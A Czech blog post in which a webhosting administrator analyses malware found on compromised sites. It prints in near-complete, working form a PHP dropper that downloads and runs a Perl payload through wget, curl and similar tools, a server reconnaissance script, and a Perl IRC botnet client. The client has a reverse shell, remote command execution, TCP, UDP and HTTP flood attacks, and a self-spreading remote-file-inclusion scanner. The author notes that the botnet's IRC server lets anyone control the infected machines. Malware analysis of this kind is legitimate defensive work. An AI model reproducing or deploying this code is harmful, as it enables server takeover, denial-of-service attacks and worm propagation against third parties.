Skip to content

Trápení webhosterů aneb cizí botnet zevnitř

Jen jeden prstíček do botnetu strčíme…

Zkoumám takhle php soubor s injectnutým kódem začínajícím asi takhle

< ?php e v a l ( b a s e 6 4 _ d e c o d e ( ' a W Y o Z n V u Y 3 R p b 2 5 f Z X h p c 3 ..........')); ? >

a při té příležitosti jsem našel kopec jiných souborů, které toho o sobě prozradily ještě o něco více. V dalším php souboru se nacházelo include(„http://domena.tld/id.txt“). Tento soubor se snaží pomocí volání funkcí system, passthru, exec a shell_exec použít wget, curl, lwp-download, lynx, fetch a GET a poté vlézt do /tmp a uložit tam další soubor v perlu. Soubor se spustí a jeho obsah můžete vidět zde:
id.txt

< ?php
system("cd /tmp; wget http://nejakadomena.com/sela;perl sela");
system('cd /tmp;curl -O http://nejakadomena.com/sela;perl sela');
system('cd /tmp;lwp-download http://nejakadomena.com/sela;perl sela');
system('cd /tmp;lynx -source http://nejakadomena.com/sela;perl sela');
system('cd /tmp;fetch http://nejakadomena.com/sela>sela;perl sela');
system('cd /tmp;GET http://nejakadomena.com/sela>sela;perl sela');

passthru("cd /tmp; wget http://nejakadomena.com/sela;perl sela");
passthru('cd /tmp;curl -O http://nejakadomena.com/sela;perl sela');
passthru('cd /tmp;lwp-download http://nejakadomena.com/sela;perl sela');
passthru('cd /tmp;lynx -source http://nejakadomena.com/sela;perl sela');
passthru('cd /tmp;fetch http://nejakadomena.com/sela>sela;perl sela');
passthru('cd /tmp;GET http://nejakadomena.com/sela>sela;perl sela');

exec("cd /tmp; wget http://nejakadomena.com/sela;perl sela");
exec('cd /tmp;curl -O http://nejakadomena.com/sela;perl sela');
exec('cd /tmp;lwp-download http://nejakadomena.com/sela;perl sela');
exec('cd /tmp;lynx -source http://nejakadomena.com/sela;perl sela');
exec('cd /tmp;fetch http://nejakadomena.com/sela>sela;perl sela');
exec('cd /tmp;GET http://nejakadomena.com/sela>sela;perl sela');

shell_exec("cd /tmp; wget http://nejakadomena.com/sela;perl sela");
shell_exec('cd /tmp;curl -O http://nejakadomena.com/sela;perl sela');
shell_exec('cd /tmp;lwp-download http://nejakadomena.com/sela;perl sela');
shell_exec('cd /tmp;lynx -source http://nejakadomena.com/sela;perl sela');
shell_exec('cd /tmp;fetch http://nejakadomena.com/sela>sela;perl sela');
shell_exec('cd /tmp;GET http://nejakadomena.com/sela>sela;perl sela');

system('rm -rf /tmp/*');
system('rm -rf /tmp/*.txt');
system('rm -rf /tmp/*.txt*');
system('rm -rf /tmp/*.txt.*');

? >

< ?php
echo "31337
";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = $_SERVER['SERVER_ADDR'];
$alb9 = get_current_user();
$os = @PHP_OS;
echo "UNITED #D-Devils By The King Sir|ToTTi
";
echo "os: $os
";
echo "uname -a: $alb
";
echo "uptime: $alb2
";
echo "id: $alb3
";
echo "pwd: $alb4
";
echo "user: $alb9
";

echo "SoftWare: $alb5
";
echo "PHPV: $alb6
";
echo "ServerName: $alb7
";
echo "ServerAddr: $alb8
";
$free = disk_free_space($alb4);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free: ".view_size($free)."
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
 if (!is_numeric($size)) {return FALSE;}
 else
 {
 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
 else {$size = $size . " B";}
 return $size;
 }
}
exit;
? >

IP adresu ovládacího irc serveru jsem smazal. Obsah souboru sela.txt zde:

#!/usr/bin/perl

use IO::Socket;
srand;
my $bPs    = 'httpds /usr/lib/httpd -f /etc/httpd.conf';
my $aMaster  = 'nix', 'Fugaru';
my $aHost   = '*@fbi.ro';
my $sServer  = 'ip-adresa-zde';
my $sPort   = '6667';
my $sTimeOut  = '300';
my $bChan   = '#nixsl3';

my $bNickLen  = '7';
chomp (my $bNick  = `whoami`);
chomp (my $bIrcName  = `whoami`);
chomp (my $bRealName = `uname -a`);
my $bDelay   = '2';

open(LOCK, '>/tmp/sess_F3wtx3es3wedxwa213s1x1ws1e32sx2') or die;
unless(flock(LOCK, 4 | 2)) { die; }

if(fork) { exit; }
$0 = $bPs;

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';

package irc;
use IO::Select;

our $irc_socket;
our $irc_select = new IO::Select;

my $cur_nick;

sub raw { print $irc_socket "$_[0]\n"; }

sub mnick {
  my $nick = $_[1];
  my @abc = ('a' .. 'z');
  for(my $i=0;$i<$_[0];$i++) { $nick .= $abc[int(rand($#abc))]; }
  return $nick;
}

sub init {

  my $socket = IO::Socket::INET->new(PeerAddr => $_[3],
                    PeerPort => $_[4],
                    Proto  => 'tcp',
                    Timeout => '5') or return 0;
  if(defined($socket)) {
    $irc_socket = $socket;
    $irc_select->add($irc_socket);
    $irc_socket->autoflush(1);
    raw("USER ".$_[1]." 0 0 ".$_[2]);
    $cur_nick = $_[0];
    raw("NICK $cur_nick");
    return 1;
  }
  return 0;
}

sub loop {
  my $time_out = time;

  for(;;) {
    my @handles = $irc_select->can_read(1);

    if((time - $time_out) > $sTimeOut) { $irc_select->remove($irc_socket); $irc_socket->close(); last; }

    next unless(@handles);

    foreach my $handle (@handles) {
      my $datain;$handle->recv($datain, 1023, 0);
      my @lines = split(/\r\n/, $datain);

      foreach my $line (@lines) {
        if($line =~ m/^PING (:.+)/) { $time_out = time; raw("PONG $1"); next; }
        elsif($line =~ m/^\:.*\s+005\s+\.*/i) { raw("JOIN $bChan"); next; }
        elsif ($line =~ m/^\:.*\s+433\s+\.*/i) { $cur_nick = mnick($bNickLen, $bNick); raw("NICK ".$cur_nick); next; }
        run::bcmd("$line");
      }
    }
  }
}
package run;
use Socket;

sub bcmd {
  my @line = split(/ /, $_[0]);

  my $RawMask = shift(@line); $RawMask =~ s/://;my ($Nick, $Mask) = $RawMask =~ /(.+)!(.+)/;
  #unless($Nick eq $aMaster) { return; }
  #unless($Mask eq $aHost)  { return; }
  my $Type = shift(@line);
  unless($Type eq "PRIVMSG") { return; }

  my $To = shift(@line);

  $" = ' '; $line[0] =~ s/://;my $Text = "@line";

  if ($Text =~ /^(\Q$cur_nick\E\s+\.|\.)(.+)/) {
    if($2 =~ /^nick\s*(.*)/) {
      if($1) { $cur_nick = $1; }
      else { $cur_nick = irc::mnick($bNickLen, $bNick); }
      irc::raw("NICK $cur_nick");
      return;
    }

    if($2 =~ /^bye/) { irc::raw('QUIT :;'); exit; }

    return;
  }

  if ($Text =~ /^(\Q$cur_nick\E\s+\!|\!)(.+)/) {

    if(!fork) {

	  if ($2 =~ /^eval\s+(.+)/) { eval "$1"; return; }      

      if ($2 =~ /^rsh\s+(.+)\s+(\d+)/) { rsh($To, $1, $2); exit; }

      if ($2 =~ /^google\s+(\d+)\s+(.+)/) { spread::start($To, $1, $2); exit; }

      if ($2 =~ /^tcpflood\s+(.+)\s+(\d+)\s+(\d+)/) { flood::tcp($To, $1, $2, $3); exit; }

      if ($2 =~ /^udpflood\s+(.+)\s+(\d+)\s+(\d+)/) { flood::udp($To, $1, $2, $3); exit; }

      if ($2 =~ /^httpflood\s+(.+)\s+(\d+)/) { flood::http($To, $1, $2); exit; }
      if ($2 =~ /^join (.*)/) {
	  	j("$1");
	  }
	  if ($2 =~ /^part (.*)/) { 
	  	p("$1");
	  }

      exit;
    }
    return;
  }

  if($Text =~ /^(\Q$cur_nick\E|\$sh)\s+(.+)/) { if(!fork) { bsh($To, $2); exit; } return; }
  if ($To eq $cur_nick) { if(!fork) { bsh($Nick, $Text); exit; } return; }
}

sub bsh {
  my $to = $_[0];
  my $cmd = $_[1];

  if($cmd =~ /cd (.+)/) { chdir("$1") or irc::raw("PRIVMSG $to :No such file or directory"); return; }

  my @sh_out = split(/\n/, `$cmd 2>&1 3>&1`);
  foreach my $line (@sh_out) { if($line) { irc::raw("PRIVMSG $to :$line"); sleep $bDelay; } }  
}

sub j { &join(@_); }
sub join {
	return unless $#_ == 0;
		irc::raw("JOIN $_[0]");
}

sub p { part(@_); }
sub part {
	irc::raw("PART $_[0]");
}

sub rsh {
  irc::raw("PRIVMSG $_[0] :\002[RSH]\002 Sending...");

  socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or exit;
  connect(SOCKET, sockaddr_in($_[2], inet_aton($_[1]))) or exit;

  open(STDIN, ">&SOCKET");
  open(STDOUT, ">&SOCKET");
  open(STDERR, ">&SOCKET");

  print "elxbot's connectback backdoor\n";
  system('/bin/sh');

  close(STDIN);
  close(STDOUT);
  close(STDERR);  
}

package spread;

sub start {
  irc::raw("PRIVMSG $_[0] :\002[GOOGLE]\002 Scanning for ".$_[1]."''.");

  our $s_time = time;
  my $m_time = $_[1] * 60; #''
  srand;

  my $bPath = '/tmp/sess_s4ex4t2c7w1d6ecsw3d1x1wwo521451';
  my $rfi  = '';
  my $bLoc = 't';
  my $cmds = "wget $BLoc -O $bPath; perl $bPath; rm -f $bPath";

  $cmds =~ s/ /%20/g;

  while($m_time > (time - $s_time)) {
    my $dup = "";my @urls = google();

    foreach my $url (@urls) {
      (my $host, my $tmp_path) = $url =~ /([\w\.\-\w]*)(\/\w*\/?)/;
      my $path = '/'; if($tmp_path =~ /(^\/\w+\/\w+\/$|^\/\w+\/$|^\/$)/) { $path = "$1"; }

      if($dup eq $host) { next; } $dup = "$host";

      $url = 'http://' . $path . '/components/com_smf/smf.php?mosConfig_absolute_path=' . $rfi . '?';

      my $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) or next;
      print $sock "GET $url HTTP/1.1\nHost: $host\nAccept: */*\nConnection: close\n\n";
      $sock->close();
    }
  }
  irc::raw("PRIVMSG $_[0] :\002[GOOGLE]\002 Scan finished.");
}

sub google() {

  my $rnd=(int(rand(300)));
  my $n= 80;
  if ($rnd<300) { $rnd=(int(rand(300))); }
  my $msn= (int(rand(10)) * $n);

  my @domains = ('ac', 'ad', 'aero', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
          'aq', 'ar', 'ar', 'as', 'at', 'au', 'aw', 'aw', 'az', 'ba', 'bb',
          'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'biz', 'bj', 'bm', 'bn', 'bo',
          'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd', 'cd',
          'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'com', 'coop',
          'cr', 'cs', 'cu', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'dz',
          'ec', 'edu', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi', 'fi',
          'fk', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi',
          'gl', 'gn', 'gob', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu',
          'gub', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie',
          'il', 'im', 'in', 'info', 'int', 'io', 'iq', 'ir', 'is', 'it',
          'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 'kp',
          'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls',
          'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'mg', 'mh', 'mk',
          'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'museum',
          'mv', 'mw', 'mx', 'my', 'mz', 'na', 'name', 'nc', 'ne', 'net',
          'nf', 'ng', 'ni', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om',
          'org', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr',
          'pro', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'rj', 'ro', 'ru', 'rw',
          'sa', 'sb', 'sc', 'sd', 'se', 'se', 'sg', 'sh', 'sj', 'sk', 'sl',
          'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td',
          'tf', 'tg', 'th', 'tm', 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw',
          'tz', 'ua', 'ug', 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 'vc',
          've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'xxx', 'ye', 'yt', 'yu',
          'za', 'zm', 'zw');

  my @str = ();
  foreach my $dom (@domains) { push (@str,"%22Powered+by+SMF%22+%2Bcom_smf+site%3A".$dom."%20"); }

  my $query = 'http://www.altavista.com/web/results?q=';
  $query  .= $str[(rand(scalar(@str)))];
  $query  .= "&stq=$msn";

  my @lst=();
  #irc::raw("privmsg #debug :DEBUG only test googling: ".$query.""); 
  my $page = http_query($query);

  while ($page =~ m/< a href=\"?http:\/\/([^>\"]+)\"?>/g){
    if ($1 !~ m/google|cache|translate/) { push (@lst,$1); }
  }
  return (@lst);
}

sub http_query {

  my $url = $_[0];
  my $host=$url;
  my $query=$url;
  my $page='';

  $host =~ s/href=\"?http:\/\///;
  $host =~ s/([\w\.\-\w]*)\/.*/$1/;
  $query =~ s/$host//;

  if ($query eq '') {$query='/';};
  eval {
	  local $SIG{ALRM} = sub { die "1";};
	  alarm 5;
	  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
	  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8) Gecko/20051111 Firefox/1.6\r\n\r\n";
	  my @r = <$sock>;
	  $page="@r";
	  alarm 0;
	  close($sock);
  };
  return $page;
}

package flood;
use POSIX;
use Socket;

our $s_time;

sub tcp {
  irc::raw("PRIVMSG $_[0] :\002[TCP-DDOS]\002 Attacking ".$_[1].":".$_[2]." for ".$_[3]."'.");

  $s_time = time;
  my @SOCKET;

  while ($_[3] > (time - $s_time)) {

    for(my $i=0;$i<200;$i++) {
      socket($SOCKET[$i], PF_INET, SOCK_STREAM, getprotobyname('tcp'));
      fcntl($SOCKET[$i], F_SETFL(), O_NONBLOCK());
    }

    for(my $i=0;$i<200;$i++) {
      connect($SOCKET[$i], sockaddr_in(!$_[2]?int(rand(65500)+1):$_[2], inet_aton($_[1])));
    }

    for(my $i=0;$i<200;$i++) {
      close($SOCKET[$i]);
    }
  }

  irc::raw("PRIVMSG $_[0] :\002[TCP-DDOS]\002 Finished.");
}

sub udp {
  irc::raw("PRIVMSG $_[0] :\002[UDP-DDOS]\002 Attacking ".$_[1].":".$_[2]." for ".$_[3]."'.");

  $s_time = time; 
  my $socket;
  my $packets = 0;
  socket($socket, PF_INET, SOCK_DGRAM, 17);

  while($_[3] > (time - $s_time)) {
    send($socket, 0, 0, sockaddr_in(!$_[2]?int(rand(65500)+1):$_[2], inet_aton($_[1])));
    $packets++;
  }
  close($socket);

  irc::raw("PRIVMSG $_[0] :\002[UDP-DDOS]\002 Sent ".$packets." packets.");
}

sub http {
  irc::raw("PRIVMSG $_[0] :\002[HTTP-DDOS]\002 Attacking ".$_[1].":80 for ".$_[2]."'.");

  $s_time = time;
  my $querys = 0;

  while ($_[2] > (time - $s_time)) {
    my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$_[1], PeerPort=>80);
    print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
    close($socket);
    $querys++;
  }

  irc::raw("PRIVMSG $_[0] :\002[HTTP-DDOS]\002 Sent ".$querys." querys.");
}

while(1) {
  if(irc::init(irc::mnick($bNickLen, $bNick), $bIrcName, $bRealName, $sServer, $sPort))
  {
    irc::loop();
  }
  sleep 10;
}
#
#
#
#
#GET IS A SHITTY FUCKING PROGRAM!

Hostname nešťastníka hostujícího soubor jsem smazal stejně tak jako ip adresy a jména všech serverů v přílohách. Na začátku souboru sela.txt můžete vidět nastavení připojení k irc serveru, tak proč se tam nemrknout? Dál v podstatě není co popisovat. Na server se lze dostat bez problémů, uvítá vás seznam právě připojených zombíků a můžete je ovládat klasickými shellovými příkazy. Moc do hloubky jsem nešel, protože na cizí věci se nesahá a kontaktoval jsem všechny zainteresované strany, tedy kromě pana sušenky. Oběti jsou většinou webhosteři a v seznamu je dokonce jeden nameserver.
Překlepy typu whoiam prosím ignorujte :-D

 

144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19151 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19154 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19157 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19160 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19166 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19169 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19172 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19175 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19178 144215-trapeni-webhosteru-aneb-cizi-botnet-zevnitr-19184

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

Time limit is exhausted. Please reload the CAPTCHA.